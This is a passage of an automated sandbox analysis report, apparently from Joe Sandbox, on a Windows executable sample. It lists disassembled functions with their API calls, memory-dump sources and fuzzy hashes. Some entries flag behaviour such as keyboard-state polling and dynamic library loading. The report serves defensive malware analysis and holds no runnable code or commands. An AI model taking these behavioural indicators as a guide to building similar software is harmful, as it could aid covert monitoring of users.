                                                            • Opcode Fuzzy Hash: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                            • Instruction Fuzzy Hash: E47150BAB08A41CAEB14EF65E0917BC7760FB84788F818536EE0D57A96CF38D105C365
                                                            Function 00007FF7EC15E67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                            • Instruction ID: e689ae67f892e84b531ab3323778b155f1b73891e3f073e155c60d5b8b11bed6
                                                            • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                            • Instruction Fuzzy Hash: D251B0B6E18A5189E710DB29E4443ACBBB0FB48B98F848136CF4E47B98DF38D156C711
                                                            Function 00007FF7EC1C0084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3740051246-0
                                                            • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                            • Instruction ID: 10788e028dd61883bfaf4657fcad7e47007912ba0b0d9a9710ba7417fed6e510
                                                            • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                            • Instruction Fuzzy Hash: B161C4BAA08A82C5EB14EB65E4807BDBB70FB84784F804137EA4D076A6CF7CD145C751
                                                            Function 00007FF7EC1BD0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD176
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD217
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD236
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD281
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD2A0
                                                              • Part of subcall function 00007FF7EC144120: WideCharToMultiByte.KERNEL32 ref: 00007FF7EC144160
                                                              • Part of subcall function 00007FF7EC144120: WideCharToMultiByte.KERNEL32 ref: 00007FF7EC14419C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            • API String ID: 666041331-0
                                                            • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                            • Instruction ID: 5d00408b2199616564ea4842b8f772ecb70322f3d588ba7c69429721a7951920
                                                            • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                            • Instruction Fuzzy Hash: 895128BAA04B56C5EB18FB56E8802ECA7A4FB89B85B854032DE4E47355DF38D441C722
                                                            Function 00007FF7EC19670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType
                                                            • String ID:
                                                            • API String ID: 4136290138-0
                                                            • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                            • Instruction ID: a3b7edc3dbe2ba1b55124951c10d90d790ebb77dddcda2ec51a9de51c5331d64
                                                            • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                            • Instruction Fuzzy Hash: 255187B7624B8492DB50DF19E4847AD77B5FB84B80F828122CB4D43764EF39E468C712
                                                            Function 00007FF7EC162998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction ID: be877cc46acb3c437c137f84d1f00575e4e6b54e4095c39039c6caf2998a3d90
                                                            • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction Fuzzy Hash: D251C2A660878285E760AF21B440379FB95EF40BA0F994276DE6E077D4DE7CE441C313
                                                            Function 00007FF7EC1A96A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction ID: 0b58e111b0f84bdb82de2bc30ac1fb0a9db0996f11c8eb804727d5a54a9d622c
                                                            • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction Fuzzy Hash: C3511D6AA18A4682DB14EF16E49066DB7A0FB88F94F548032EF8E47765CF3CD440C751
                                                            Function 00007FF7EC121CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction ID: 0a5b2f9475670eba5598f7a46a26b426d9affce1c8703a1946aca048fbb832de
                                                            • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction Fuzzy Hash: 095100BAB08681CBE758EF31E404669B764FB45794F500232FA5A43795CF38E861C711
                                                            Function 00007FF7EC15BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction ID: a95c20acca2a0857a2394007992e3e21f04195cac6d3445601b1bd8d30050930
                                                            • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction Fuzzy Hash: 9541C5A9F09A4681FA15AF1AB8007B5E395BF44BD0F894537DE1D4B398DE7CE400C322
                                                            Function 00007FF7EC1CFF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable
                                                            • String ID:
                                                            • API String ID: 2939132127-0
                                                            • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction ID: 8df73bbeee4f5fb7d9515fe496e9d0c904927c2072d29f702dcb4e7a0c7c4e82
                                                            • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction Fuzzy Hash: 9E51C67A90978681EB60DB15E444778BBA0EB85F85FA84537CE1D473A4CF3DE441C322
                                                            Function 00007FF7EC18D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction ID: 4e5c124ab7ee95fe761cdddb6510b25a4a1b2e63c80fa5fbe41dcec2fff57e90
                                                            • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction Fuzzy Hash: 8831F77AA0870587E710EF19F5443A9B791F788BA8F900132EE5E8B798CE3CE845C711
                                                            Function 00007FF7EC191B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                            • String ID:
                                                            • API String ID: 2655805287-0
                                                            • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction ID: 03606d19442ca05345383e85f5fb7ef6f31c95210306d5d2c12b3aaa7544b382
                                                            • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction Fuzzy Hash: 632129A6B0978245EB04EB16B904375A691FF89FE0F944532EE1D47795EE3CE440C311
                                                            Function 00007FF7EC1B2E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction ID: 4d3b1eda63b7f74b5dedf562c644aa8b4afd4d0c48e4dfbfd2bf4bd6f14d2b65
                                                            • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction Fuzzy Hash: 9B21D6AAB08641C2EB04EF27F4842ADE7A0FB89F90B444036EE0D87755DE38D445C751
                                                            Function 00007FF7EC122370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                            • Instruction ID: ad17f7f222c1d9db94c3721c5fbcdf796eae07658135fa6e40f44c579ae553e2
                                                            • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                            • Instruction Fuzzy Hash: 67314BBA918742C6E344AF02B84033AFBA5FB89B90FD44136D9594B754CF7CE455CB22
                                                            Function 00007FF7EC151F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2067211477-0
                                                            • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                            • Instruction ID: c45214345c5261abeaab816fc0f5468b39ff565b8a145816b222e307c9735925
                                                            • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                            • Instruction Fuzzy Hash: 202180A9A0D78286EE56EF69F450379E291AF84B80F984433EB0D03758DF3CE404C622
                                                            Function 00007FF7EC15F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction ID: c5a941a8eb441273f1068a53e0fde302c4ae44fa6c8a098444b41f4c8f55546d
                                                            • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction Fuzzy Hash: A0118FAEE196834BFA54352DF44637591416F543A0F954237EB6E467DA8F3CA840C123
                                                            Function 00007FF7EC18CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction ID: d04926d86fa133a9ab311e8249c53358757070799170767abec910176d641e0c
                                                            • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction Fuzzy Hash: 5F11557A608B8186E710DF12F840269BBB4FB88F81B994436DF8907B18DF38E415C741
                                                            Function 00007FF7EC18CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction ID: 7e34eb6e64381e0f7276a6d64d038696e0bd95131514d11af250c7775087c9de
                                                            • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction Fuzzy Hash: B211367AA08B81C6E710DF56F840669BBB4FB88F81B994436DF8947B18DF38E815C741
                                                            Function 00007FF7EC18B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
